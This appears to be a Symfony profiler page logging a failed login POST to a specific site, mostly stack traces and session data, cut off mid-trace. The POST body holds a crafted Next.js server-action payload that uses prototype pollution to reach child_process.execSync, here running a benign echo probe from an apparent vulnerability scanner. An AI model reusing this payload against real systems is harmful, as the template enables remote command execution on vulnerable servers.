302 redirect from POST @app_login (e2d0f0)

POST https://pa.mediaffair.ch/login

Request / Response

Request

GET Parameters

No GET parameters

POST Parameters

Key Value
0
"{"then": "$1:__proto__:then", "status": "resolved_model", "reason": -1, "value": "{\"then\":\"$B1337\"}", "_response": {"_prefix": "var res=process.mainModule.require('child_process').execSync('echo VULN_TEST_123456 2>&1 | head -c 500 | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});", "_chunks": "$Q2", "_formData": {"get": "$1:constructor:constructor"}}}"
1
""$@0""
2
"[]"

Uploaded Files

No files were uploaded

Request Attributes

Key Value
_controller
"App\Controller\SecurityController::login"
_firewall_context
"security.firewall.map.context.main"
_redirected
true
_route
"app_login"
_route_params
[]
_security_firewall_run
"_security_main"
_security_remember_me_cookie
Symfony\Component\HttpFoundation\Cookie {#511
  #name: "REMEMBERME"
  #value: null
  #domain: null
  #expire: 1
  #path: "/"
  #secure: true
  #httpOnly: true
  -raw: false
  -sameSite: "lax"
  -secureDefault: false
}
_stopwatch_token
"898ec1"

Request Headers

Header Value
accept
"*/*"
accept-encoding
"gzip, deflate"
content-length
"772"
content-type
"multipart/form-data; boundary=--------WebKitFormBoundaryx8jO2oVc6SWP3Sad"
cookie
"PHPSESSID=ab9c2c283020b3478947c2b317115f42; sf_redirect=%7B%22token%22%3A%22e2d0f0%22%2C%22route%22%3A%22app_login%22%2C%22method%22%3A%22POST%22%2C%22controller%22%3A%7B%22class%22%3A%22App%5C%5CController%5C%5CSecurityController%22%2C%22method%22%3A%22login%22%2C%22file%22%3A%22%5C%2Fhome%5C%2Fclients%5C%2F013cd3874d6bf3c597cb5d6bacfc5c3d%5C%2Fsites%5C%2Fpumarchives%5C%2Freleases%5C%2F9%5C%2Fsrc%5C%2FController%5C%2FSecurityController.php%22%2C%22line%22%3A13%7D%2C%22status_code%22%3A302%2C%22status_text%22%3A%22Found%22%7D"
host
"pa.mediaffair.ch"
next-action
"x"
user-agent
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0"
x-forwarded-proto
"https"
x-nextjs-html-request-id
"SSTMXm7OJ_g0Ncx6jpQt9"
x-nextjs-request-id
"b5dce965"
x-php-ob-level
"1"

Request Content

Request content not available (it was retrieved as a resource).

Response

Response Headers

Header Value
cache-control
"no-cache, private"
content-type
"text/html; charset=UTF-8"
date
"Wed, 10 Dec 2025 03:45:14 GMT"
location
"/login"
set-cookie
"REMEMBERME=deleted; expires=Tue, 10 Dec 2024 03:45:13 GMT; Max-Age=0; path=/; secure; httponly; samesite=lax"
x-debug-token
"678e74"

Cookies

Request Cookies

Key Value
PHPSESSID
"ab9c2c283020b3478947c2b317115f42"
sf_redirect
"{"token":"e2d0f0","route":"app_login","method":"POST","controller":{"class":"App\\Controller\\SecurityController","method":"login","file":"\/home\/clients\/013cd3874d6bf3c597cb5d6bacfc5c3d\/sites\/pumarchives\/releases\/9\/src\/Controller\/SecurityController.php","line":13},"status_code":302,"status_text":"Found"}"

Response Cookies

Key Value
REMEMBERME
Symfony\Component\HttpFoundation\Cookie {#511
  #name: "REMEMBERME"
  #value: null
  #domain: null
  #expire: 1
  #path: "/"
  #secure: true
  #httpOnly: true
  -raw: false
  -sameSite: "lax"
  -secureDefault: false
}

Session 4

Session Metadata

Key Value
Created
"Wed, 10 Dec 25 04:45:13 +0100"
Last used
"Wed, 10 Dec 25 04:45:13 +0100"
Lifetime
0

Session Attributes

Attribute Value
_security.last_error
Symfony\Component\Security\Core\Exception\BadCredentialsException {#339
  #message: "Bad credentials."
  #code: 0
  #file: "/home/clients/013cd3874d6bf3c597cb5d6bacfc5c3d/sites/pumarchives/releases/9/vendor/symfony/security-http/Authentication/AuthenticatorManager.php"
  #line: 251
  -previous: Symfony\Component\Security\Core\Exception\UserNotFoundException {#647 …}
  -token: null
  trace: {
    /home/clients/013cd3874d6bf3c597cb5d6bacfc5c3d/sites/pumarchives/releases/9/vendor/symfony/security-http/Authentication/AuthenticatorManager.php:251 {
      Symfony\Component\Security\Http\Authentication\AuthenticatorManager->handleAuthenticationFailure(AuthenticationException $authenticationException, Request $request, AuthenticatorInterface $authenticator, ?Passport $passport): Response …
      › if ($this->hideUserNotFoundExceptions && ($authenticationException instanceof UserNotFoundException || ($authenticationException instanceof AccountStatusException && !$authenticationException instanceof CustomUserMessageAccountStatusException))) {    $authenticationException = new BadCredentialsException('Bad credentials.', 0, $authenticationException);}
    }
    /home/clients/013cd3874d6bf3c597cb5d6bacfc5c3d/sites/pumarchives/releases/9/vendor/symfony/security-http/Authentication/AuthenticatorManager.php:207 {
      Symfony\Component\Security\Http\Authentication\AuthenticatorManager->executeAuthenticator(AuthenticatorInterface $authenticator, Request $request): Response …
      › // oh no! Authentication failed!$response = $this->handleAuthenticationFailure($e, $request, $authenticator, $passport);if ($response instanceof Response) {
      arguments: {
        $authenticationException: Symfony\Component\Security\Core\Exception\UserNotFoundException {#647 …}
        $request: Symfony\Component\HttpFoundation\Request {#15 …}
        $authenticator: Symfony\Component\Security\Http\Authenticator\Debug\TraceableAuthenticator {#338 …}
        $passport: Symfony\Component\Security\Http\Authenticator\Passport\Passport {#328 …}
      }
    }
    /home/clients/013cd3874d6bf3c597cb5d6bacfc5c3d/sites/pumarchives/releases/9/vendor/symfony/security-http/Authentication/AuthenticatorManager.php:154 {
      Symfony\Component\Security\Http\Authentication\AuthenticatorManager->executeAuthenticators(array $authenticators, Request $request): Response …
      › 
      › $response = $this->executeAuthenticator($authenticator, $request);if (null !== $response) {
      arguments: {
        $authenticator: Symfony\Component\Security\Http\Authenticator\Debug\TraceableAuthenticator {#338 …}
        $request: Symfony\Component\HttpFoundation\Request {#15 …}
      }
    }
    /home/clients/013cd3874d6bf3c597cb5d6bacfc5c3d/sites/pumarchives/releases/9/vendor/symfony/security-http/Authentication/AuthenticatorManager.php:136 {
      Symfony\Component\Security\Http\Authentication\AuthenticatorManager->authenticateRequest(Request $request): Response …
      › 
      ›     return $this->executeAuthenticators($authenticators, $request);}
      arguments: {
        $authenticators: [ …1]
        $request: Symfony\Component\HttpFoundation\Request {#15 …}
      }
    }
    /home/clients/013cd3874d6bf3c597cb5d6bacfc5c3d/sites/pumarchives/releases/9/vendor/symfony/security-http/Firewall/AuthenticatorManagerListener.php:40 {
      Symfony\Component\Security\Http\Firewall\AuthenticatorManagerListener->authenticate(RequestEvent $event): void …
      › $request = $event->getRequest();$response = $this->authenticatorManager->authenticateRequest($request);if (null === $response) {
      arguments: {
        $request: Symfony\Component\HttpFoundation\Request {#15 …}
      }
    }
    /home/clients/013cd3874d6bf3c597cb5d6bacfc5c3d/sites/pumarchives/releases/9/vendor/symfony/security-http/Authenticator/Debug/TraceableAuthenticatorManagerListener.php:65 {
      Symfony\Component\Security\Http\Authenticator\Debug\TraceableAuthenticatorManagerListener->authenticate(RequestEvent $event): void …
      › 
      › $this->authenticationManagerListener->authenticate($event);arguments: {
        $event: Symfony\Component\HttpKernel\Event\RequestEvent {#167 …}
      }
    }
    /home/clients/013cd3874d6bf3c597cb5d6bacfc5c3d/sites/pumarchives/releases/9/vendor/symfony/security-bundle/Debug/WrappedLazyListener.php:46 {
      Symfony\Bundle\SecurityBundle\Debug\WrappedLazyListener->authenticate(RequestEvent $event) …
      › try {    $ret = $this->listener->authenticate($event);} catch (LazyResponseException $e) {
      arguments: {
        $event: Symfony\Component\HttpKernel\Event\RequestEvent {#167 …}
      }
    }
    /home/clients/013cd3874d6bf3c597cb5d6bacfc5c3d/sites/pumarchives/releases/9/vendor/symfony/security-http/Firewall/AbstractListener.php:26 {
      Symfony\Component\Security\Http\Firewall\AbstractListener->__invoke(RequestEvent $event) …
      › if (false !== $this->supports($event->getRequest())) {    $this->authenticate($event);}
      arguments: {
        $event: Symfony\Component\HttpKernel\Event\RequestEvent {#167 …}
      }
    }
    /home/clients/013cd3874d6bf3c597cb5d6bacfc5c3d/sites/pumarchives/releases/9/vendor/symfony/security-bundle/Security/LazyFirewallContext.php:60 {
      Symfony\Bundle\SecurityBundle\Security\LazyFirewallContext->__invoke(RequestEvent $event) …
      › foreach ($listeners as $listener) {    $listener($event);arguments: {
        $event: Symfony\Component\HttpKernel\Event\RequestEvent {#167 …}
      }
    }
    /home/clients/013cd3874d6bf3c597cb5d6bacfc5c3d/sites/pumarchives/releases/9/vendor/symfony/security-bundle/Debug/TraceableFirewallListener.php:70 {
      Symfony\Bundle\SecurityBundle\Debug\TraceableFirewallListener->callListeners(RequestEvent $event, iterable $listeners) …
      › 
      ›     $listener($event);} else {
      arguments: {
        $event: Symfony\Component\HttpKernel\Event\RequestEvent {#167 …}
      }
    }
    /home/clients/013cd3874d6bf3c597cb5d6bacfc5c3d/sites/pumarchives/releases/9/vendor/symfony/security-http/Firewall.php:92 {
      Symfony\Component\Security\Http\Firewall->onKernelRequest(RequestEvent $event) …
      › 
      ›     $this->callListeners($event, $authenticationListeners());}
      arguments: {
        $event: Symfony\Component\HttpKernel\Event\RequestEvent {#167 …}
        $listeners: Generator {#255 …}
      }
    }
    /home/clients/013cd3874d6bf3c597cb5d6bacfc5c3d/sites/pumarchives/releases/9/vendor/symfony/event-dispatcher/Debug/WrappedListener.php:115 {
      Symfony\Component\EventDispatcher\Debug\WrappedListener->__invoke(object $event, string $eventName, EventDispatcherInterface $dispatcher): void …
      › 
      › ($this->optimizedListener ?? $this->listener)($event, $eventName, $dispatcher);arguments: {
        $event: Symfony\Component\HttpKernel\Event\RequestEvent {#167 …}
        ...: {
          "kernel.request"
          Symfony\Component\HttpKernel\Debug\TraceableEventDispatcher {#169 …}
        }
      }
    }
    /home/clients/013cd3874d6bf3c597cb5d6bacfc5c3d/sites/pumarchives/releases/9/vendor/symfony/event-dispatcher/EventDispatcher.php:206 {
      Symfony\Component\EventDispatcher\EventDispatcher->callListeners(iterable $listeners, string $eventName, object $event) …
      ›     }    $listener($event, $eventName, $this);}
      arguments: {
        $event: Symfony\Component\HttpKernel\Event\RequestEvent {#167 …}
        $eventName: "kernel.request"
        $dispatcher: Symfony\Component\HttpKernel\Debug\TraceableEventDispatcher {#169 …}
      }
    }
    /home/clients/013cd3874d6bf3c597cb5d6bacfc5c3d/sites/pumarchives/releases/9/vendor/symfony/event-dispatcher/EventDispatcher.php:56 {
      Symfony\Component\EventDispatcher\EventDispatcher->dispatch(object $event, string $eventName = null): object …
      › if ($listeners) {    $this->callListeners($listeners, $eventName, $event);}
      arguments: {
        $listeners: [ …10]
        $eventName: "kernel.request"
        $event: Symfony\Component\HttpKernel\Event\RequestEvent {#167 …}
      }
    }
    /home/clients/013cd3874d6bf3c597cb5d6bacfc5c3d/sites/pumarchives/releases/9/vendor/symfony/event-dispatcher/Debug/TraceableEventDispatcher.php:127 {
      Symfony\Component\EventDispatcher\Debug\TraceableEventDispatcher->dispatch(object $event, string $eventName = null): object …
      › try {    $this->dispatcher->dispatch($event, $eventName);} finally {
      arguments: {
        $event: Symfony\Component\HttpKernel\Event\RequestEvent {#167 …}
        $eventName: "kernel.request"
      }
    }
    /home/clients/013cd3874d6bf3c597cb5d6bacfc5c3d/sites/pumarchives/releases/9/vendor/symfony/http-kernel/HttpKernel.php:139 {
      Symfony\Component\HttpKernel\HttpKernel->handleRaw(Request $request, int $type = self::MAIN_REQUEST): Response …
      › $event = new RequestEvent($this, $request, $type);$this->dispatcher->dispatch($event, KernelEvents::REQUEST);arguments: {
        $event: Symfony\Component\HttpKernel\Event\RequestEvent {#167 …}
        $eventName: "kernel.request"
      }
    }
    /home/clients/013cd3874d6bf3c597cb5d6bacfc5c3d/sites/pumarchives/releases/9/vendor/symfony/http-kernel/HttpKernel.php:74 {
      Symfony\Component\HttpKernel\HttpKernel->handle(Request $request, int $type = HttpKernelInterface::MAIN_REQUEST, bool $catch = true): Response …
      › try {    return $this->handleRaw($request, $type);} catch (\Throwable $e) {
      arguments: {
        $request: Symfony\Component\HttpFoundation\Request {#15 …}
        $type: 1
      }
    }
    /home/clients/013cd3874d6bf3c597cb5d6bacfc5c3d/sites/pumarchives/releases/9/vendor/symfony/http-kernel/Kernel.php:184 {
      Symfony\Component\HttpKernel\Kernel->handle(Request $request, int $type = HttpKernelInterface::MAIN_REQUEST, bool $catch = true): Response …
      › try {    return $this->getHttpKernel()->handle($request, $type, $catch);} finally {
      arguments: {
        $request: Symfony\Component\HttpFoundation\Request {#15 …}
        $type: 1
        $catch: true
      }
    }
    /home/clients/013cd3874d6bf3c597cb5d6bacfc5c3d/sites/pumarchives/releases/9/vendor/symfony/runtime/Runner/Symfony/HttpKernelRunner.php:35 {
      Symfony\Component\Runtime\Runner\Symfony\HttpKernelRunner->run(): int …
      › {    $response = $this->kernel->handle($this->request);    $response->send();
      arguments: {
        $request: Symfony\Component\HttpFoundation\Request {#15 …}
      }
    }
    /home/clients/013cd3874d6bf3c597cb5d6bacfc5c3d/sites/pumarchives/releases/9/vendor/autoload_runtime.php:29 {
      require_once …
      ›         ->getRunner($app)        ->run());
    }
    /home/clients/013cd3874d6bf3c597cb5d6bacfc5c3d/sites/pumarchives/releases/9/public/index.php:5 {
      › 
      › require_once dirname(__DIR__).'/vendor/autoload_runtime.php';arguments: {
        "/home/clients/013cd3874d6bf3c597cb5d6bacfc5c3d/sites/pumarchives/releases/9/vendor/autoload_runtime.php"
      }
    }
  }
}
_security.last_username
""
_security.main.target_path
"https://pa.mediaffair.ch/"

Session Usage

4 Usages
Stateless check enabled
Usage
Symfony\Component\Security\Core\Authentication\Token\Storage\UsageTrackingTokenStorage:41
[
  [
    "file" => "/home/clients/013cd3874d6bf3c597cb5d6bacfc5c3d/sites/pumarchives/releases/9/vendor/symfony/security-core/Authentication/Token/Storage/UsageTrackingTokenStorage.php"
    "line" => 41
    "function" => "getMetadataBag"
    "class" => "Symfony\Component\HttpFoundation\Session\Session"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/013cd3874d6bf3c597cb5d6bacfc5c3d/sites/pumarchives/releases/9/vendor/symfony/security-http/Authenticator/RememberMeAuthenticator.php"
    "line" => 64
    "function" => "getToken"
    "class" => "Symfony\Component\Security\Core\Authentication\Token\Storage\UsageTrackingTokenStorage"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/013cd3874d6bf3c597cb5d6bacfc5c3d/sites/pumarchives/releases/9/vendor/symfony/security-http/Authentication/AuthenticatorManager.php"
    "line" => 107
    "function" => "supports"
    "class" => "Symfony\Component\Security\Http\Authenticator\RememberMeAuthenticator"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/013cd3874d6bf3c597cb5d6bacfc5c3d/sites/pumarchives/releases/9/vendor/symfony/security-http/Firewall/AuthenticatorManagerListener.php"
    "line" => 34
    "function" => "supports"
    "class" => "Symfony\Component\Security\Http\Authentication\AuthenticatorManager"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/013cd3874d6bf3c597cb5d6bacfc5c3d/sites/pumarchives/releases/9/vendor/symfony/security-http/Authenticator/Debug/TraceableAuthenticatorManagerListener.php"
    "line" => 39
    "function" => "supports"
    "class" => "Symfony\Component\Security\Http\Firewall\AuthenticatorManagerListener"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/013cd3874d6bf3c597cb5d6bacfc5c3d/sites/pumarchives/releases/9/vendor/symfony/security-bundle/Debug/WrappedLazyListener.php"
    "line" => 38
    "function" => "supports"
    "class" => "Symfony\Component\Security\Http\Authenticator\Debug\TraceableAuthenticatorManagerListener"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/013cd3874d6bf3c597cb5d6bacfc5c3d/sites/pumarchives/releases/9/vendor/symfony/security-http/Firewall/AbstractListener.php"
    "line" => 25
    "function" => "supports"
    "class" => "Symfony\Bundle\SecurityBundle\Debug\WrappedLazyListener"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/013cd3874d6bf3c597cb5d6bacfc5c3d/sites/pumarchives/releases/9/vendor/symfony/security-bundle/Security/LazyFirewallContext.php"
    "line" => 60
    "function" => "__invoke"
    "class" => "Symfony\Component\Security\Http\Firewall\AbstractListener"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/013cd3874d6bf3c597cb5d6bacfc5c3d/sites/pumarchives/releases/9/vendor/symfony/security-bundle/Debug/TraceableFirewallListener.php"
    "line" => 70
    "function" => "__invoke"
    "class" => "Symfony\Bundle\SecurityBundle\Security\LazyFirewallContext"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/013cd3874d6bf3c597cb5d6bacfc5c3d/sites/pumarchives/releases/9/vendor/symfony/security-http/Firewall.php"
    "line" => 92
    "function" => "callListeners"
    "class" => "Symfony\Bundle\SecurityBundle\Debug\TraceableFirewallListener"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/013cd3874d6bf3c597cb5d6bacfc5c3d/sites/pumarchives/releases/9/vendor/symfony/event-dispatcher/Debug/WrappedListener.php"
    "line" => 115
    "function" => "onKernelRequest"
    "class" => "Symfony\Component\Security\Http\Firewall"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/013cd3874d6bf3c597cb5d6bacfc5c3d/sites/pumarchives/releases/9/vendor/symfony/event-dispatcher/EventDispatcher.php"
    "line" => 206
    "function" => "__invoke"
    "class" => "Symfony\Component\EventDispatcher\Debug\WrappedListener"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/013cd3874d6bf3c597cb5d6bacfc5c3d/sites/pumarchives/releases/9/vendor/symfony/event-dispatcher/EventDispatcher.php"
    "line" => 56
    "function" => "callListeners"
    "class" => "Symfony\Component\EventDispatcher\EventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/013cd3874d6bf3c597cb5d6bacfc5c3d/sites/pumarchives/releases/9/vendor/symfony/event-dispatcher/Debug/TraceableEventDispatcher.php"
    "line" => 127
    "function" => "dispatch"
    "class" => "Symfony\Component\EventDispatcher\EventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/013cd3874d6bf3c597cb5d6bacfc5c3d/sites/pumarchives/releases/9/vendor/symfony/http-kernel/HttpKernel.php"
    "line" => 139
    "function" => "dispatch"
    "class" => "Symfony\Component\EventDispatcher\Debug\TraceableEventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/013cd3874d6bf3c597cb5d6bacfc5c3d/sites/pumarchives/releases/9/vendor/symfony/http-kernel/HttpKernel.php"
    "line" => 74
    "function" => "handleRaw"
    "class" => "Symfony\Component\HttpKernel\HttpKernel"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/013cd3874d6bf3c597cb5d6bacfc5c3d/sites/pumarchives/releases/9/vendor/symfony/http-kernel/Kernel.php"
    "line" => 184
    "function" => "handle"
    "class" => "Symfony\Component\HttpKernel\HttpKernel"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/013cd3874d6bf3c597cb5d6bacfc5c3d/sites/pumarchives/releases/9/vendor/symfony/runtime/Runner/Symfony/HttpKernelRunner.php"
    "line" => 35
    "function" => "handle"
    "class" => "Symfony\Component\HttpKernel\Kernel"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/013cd3874d6bf3c597cb5d6bacfc5c3d/sites/pumarchives/releases/9/vendor/autoload_runtime.php"
    "line" => 29
    "function" => "run"
    "class" => "Symfony\Component\Runtime\Runner\Symfony\HttpKernelRunner"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/013cd3874d6bf3c597cb5d6bacfc5c3d/sites/pumarchives/releases/9/public/index.php"
    "line" => 5
    "args" => [
      "/home/clients/013cd3874d6bf3c597cb5d6bacfc5c3d/sites/pumarchives/releases/9/vendor/autoload_runtime.php"
    ]
    "function" => "require_once"
  ]
]
App\Security\AppCustomAuthenticator:36
[
  [
    "file" => "/home/clients/013cd3874d6bf3c597cb5d6bacfc5c3d/sites/pumarchives/releases/9/src/Security/AppCustomAuthenticator.php"
    "line" => 36
    "function" => "set"
    "class" => "Symfony\Component\HttpFoundation\Session\Session"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/013cd3874d6bf3c597cb5d6bacfc5c3d/sites/pumarchives/releases/9/vendor/symfony/security-http/Authenticator/Debug/TraceableAuthenticator.php"
    "line" => 60
    "function" => "authenticate"
    "class" => "App\Security\AppCustomAuthenticator"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/013cd3874d6bf3c597cb5d6bacfc5c3d/sites/pumarchives/releases/9/vendor/symfony/security-http/Authentication/AuthenticatorManager.php"
    "line" => 171
    "function" => "authenticate"
    "class" => "Symfony\Component\Security\Http\Authenticator\Debug\TraceableAuthenticator"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/013cd3874d6bf3c597cb5d6bacfc5c3d/sites/pumarchives/releases/9/vendor/symfony/security-http/Authentication/AuthenticatorManager.php"
    "line" => 154
    "function" => "executeAuthenticator"
    "class" => "Symfony\Component\Security\Http\Authentication\AuthenticatorManager"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/013cd3874d6bf3c597cb5d6bacfc5c3d/sites/pumarchives/releases/9/vendor/symfony/security-http/Authentication/AuthenticatorManager.php"
    "line" => 136
    "function" => "executeAuthenticators"
    "class" => "Symfony\Component\Security\Http\Authentication\AuthenticatorManager"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/013cd3874d6bf3c597cb5d6bacfc5c3d/sites/pumarchives/releases/9/vendor/symfony/security-http/Firewall/AuthenticatorManagerListener.php"
    "line" => 40
    "function" => "authenticateRequest"
    "class" => "Symfony\Component\Security\Http\Authentication\AuthenticatorManager"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/013cd3874d6bf3c597cb5d6bacfc5c3d/sites/pumarchives/releases/9/vendor/symfony/security-http/Authenticator/Debug/TraceableAuthenticatorManagerListener.php"
    "line" => 65
    "function" => "authenticate"
    "class" => "Symfony\Component\Security\Http\Firewall\AuthenticatorManagerListener"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/013cd3874d6bf3c597cb5d6bacfc5c3d/sites/pumarchives/releases/9/vendor/symfony/security-bundle/Debug/WrappedLazyListener.php"
    "line" => 46
    "function" => "authenticate"
    "class" => "Symfony\Component\Security\Http\Authenticator\Debug\TraceableAuthenticatorManagerListener"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/013cd3874d6bf3c597cb5d6bacfc5c3d/sites/pumarchives/releases/9/vendor/symfony/security-http/Firewall/AbstractListener.php"
    "line" => 26
    "function" => "authenticate"
    "class" => "Symfony\Bundle\SecurityBundle\Debug\WrappedLazyListener"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/013cd3874d6bf3c597cb5d6bacfc5c3d/sites/pumarchives/releases/9/vendor/symfony/security-bundle/Security/LazyFirewallContext.php"
    "line" => 60
    "function" => "__invoke"
    "class" => "Symfony\Component\Security\Http\Firewall\AbstractListener"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/013cd3874d6bf3c597cb5d6bacfc5c3d/sites/pumarchives/releases/9/vendor/symfony/security-bundle/Debug/TraceableFirewallListener.php"
    "line" => 70
    "function" => "__invoke"
    "class" => "Symfony\Bundle\SecurityBundle\Security\LazyFirewallContext"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/013cd3874d6bf3c597cb5d6bacfc5c3d/sites/pumarchives/releases/9/vendor/symfony/security-http/Firewall.php"
    "line" => 92
    "function" => "callListeners"
    "class" => "Symfony\Bundle\SecurityBundle\Debug\TraceableFirewallListener"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/013cd3874d6bf3c597cb5d6bacfc5c3d/sites/pumarchives/releases/9/vendor/symfony/event-dispatcher/Debug/WrappedListener.php"
    "line" => 115
    "function" => "onKernelRequest"
    "class" => "Symfony\Component\Security\Http\Firewall"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/013cd3874d6bf3c597cb5d6bacfc5c3d/sites/pumarchives/releases/9/vendor/symfony/event-dispatcher/EventDispatcher.php"
    "line" => 206
    "function" => "__invoke"
    "class" => "Symfony\Component\EventDispatcher\Debug\WrappedListener"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/013cd3874d6bf3c597cb5d6bacfc5c3d/sites/pumarchives/releases/9/vendor/symfony/event-dispatcher/EventDispatcher.php"
    "line" => 56
    "function" => "callListeners"
    "class" => "Symfony\Component\EventDispatcher\EventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/013cd3874d6bf3c597cb5d6bacfc5c3d/sites/pumarchives/releases/9/vendor/symfony/event-dispatcher/Debug/TraceableEventDispatcher.php"
    "line" => 127
    "function" => "dispatch"
    "class" => "Symfony\Component\EventDispatcher\EventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/013cd3874d6bf3c597cb5d6bacfc5c3d/sites/pumarchives/releases/9/vendor/symfony/http-kernel/HttpKernel.php"
    "line" => 139
    "function" => "dispatch"
    "class" => "Symfony\Component\EventDispatcher\Debug\TraceableEventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/013cd3874d6bf3c597cb5d6bacfc5c3d/sites/pumarchives/releases/9/vendor/symfony/http-kernel/HttpKernel.php"
    "line" => 74
    "function" => "handleRaw"
    "class" => "Symfony\Component\HttpKernel\HttpKernel"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/013cd3874d6bf3c597cb5d6bacfc5c3d/sites/pumarchives/releases/9/vendor/symfony/http-kernel/Kernel.php"
    "line" => 184
    "function" => "handle"
    "class" => "Symfony\Component\HttpKernel\HttpKernel"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/013cd3874d6bf3c597cb5d6bacfc5c3d/sites/pumarchives/releases/9/vendor/symfony/runtime/Runner/Symfony/HttpKernelRunner.php"
    "line" => 35
    "function" => "handle"
    "class" => "Symfony\Component\HttpKernel\Kernel"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/013cd3874d6bf3c597cb5d6bacfc5c3d/sites/pumarchives/releases/9/vendor/autoload_runtime.php"
    "line" => 29
    "function" => "run"
    "class" => "Symfony\Component\Runtime\Runner\Symfony\HttpKernelRunner"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/013cd3874d6bf3c597cb5d6bacfc5c3d/sites/pumarchives/releases/9/public/index.php"
    "line" => 5
    "args" => [
      "/home/clients/013cd3874d6bf3c597cb5d6bacfc5c3d/sites/pumarchives/releases/9/vendor/autoload_runtime.php"
    ]
    "function" => "require_once"
  ]
]
Symfony\Component\Security\Http\Authenticator\AbstractLoginFormAuthenticator:51
[
  [
    "file" => "/home/clients/013cd3874d6bf3c597cb5d6bacfc5c3d/sites/pumarchives/releases/9/vendor/symfony/security-http/Authenticator/AbstractLoginFormAuthenticator.php"
    "line" => 51
    "function" => "set"
    "class" => "Symfony\Component\HttpFoundation\Session\Session"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/013cd3874d6bf3c597cb5d6bacfc5c3d/sites/pumarchives/releases/9/vendor/symfony/security-http/Authenticator/Debug/TraceableAuthenticator.php"
    "line" => 78
    "function" => "onAuthenticationFailure"
    "class" => "Symfony\Component\Security\Http\Authenticator\AbstractLoginFormAuthenticator"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/013cd3874d6bf3c597cb5d6bacfc5c3d/sites/pumarchives/releases/9/vendor/symfony/security-http/Authentication/AuthenticatorManager.php"
    "line" => 254
    "function" => "onAuthenticationFailure"
    "class" => "Symfony\Component\Security\Http\Authenticator\Debug\TraceableAuthenticator"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/013cd3874d6bf3c597cb5d6bacfc5c3d/sites/pumarchives/releases/9/vendor/symfony/security-http/Authentication/AuthenticatorManager.php"
    "line" => 207
    "function" => "handleAuthenticationFailure"
    "class" => "Symfony\Component\Security\Http\Authentication\AuthenticatorManager"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/013cd3874d6bf3c597cb5d6bacfc5c3d/sites/pumarchives/releases/9/vendor/symfony/security-http/Authentication/AuthenticatorManager.php"
    "line" => 154
    "function" => "executeAuthenticator"
    "class" => "Symfony\Component\Security\Http\Authentication\AuthenticatorManager"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/013cd3874d6bf3c597cb5d6bacfc5c3d/sites/pumarchives/releases/9/vendor/symfony/security-http/Authentication/AuthenticatorManager.php"
    "line" => 136
    "function" => "executeAuthenticators"
    "class" => "Symfony\Component\Security\Http\Authentication\AuthenticatorManager"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/013cd3874d6bf3c597cb5d6bacfc5c3d/sites/pumarchives/releases/9/vendor/symfony/security-http/Firewall/AuthenticatorManagerListener.php"
    "line" => 40
    "function" => "authenticateRequest"
    "class" => "Symfony\Component\Security\Http\Authentication\AuthenticatorManager"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/013cd3874d6bf3c597cb5d6bacfc5c3d/sites/pumarchives/releases/9/vendor/symfony/security-http/Authenticator/Debug/TraceableAuthenticatorManagerListener.php"
    "line" => 65
    "function" => "authenticate"
    "class" => "Symfony\Component\Security\Http\Firewall\AuthenticatorManagerListener"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/013cd3874d6bf3c597cb5d6bacfc5c3d/sites/pumarchives/releases/9/vendor/symfony/security-bundle/Debug/WrappedLazyListener.php"
    "line" => 46
    "function" => "authenticate"
    "class" => "Symfony\Component\Security\Http\Authenticator\Debug\TraceableAuthenticatorManagerListener"
    "type" => "->"
  ]
  [
    "file" => "/home/clients/013cd3874d6bf3c597cb5d6bacfc5c3d/sites/pumarchives/releases/9/vendor/symfony/security-http/Firewall/AbstractListener.php"
    "line" => 26
    "function" => "authenticate"
    "class" => "Symfony\Bundle\SecurityBundle\Debug\WrappedLazyListener"
    "type" => "->"
  ]
  [
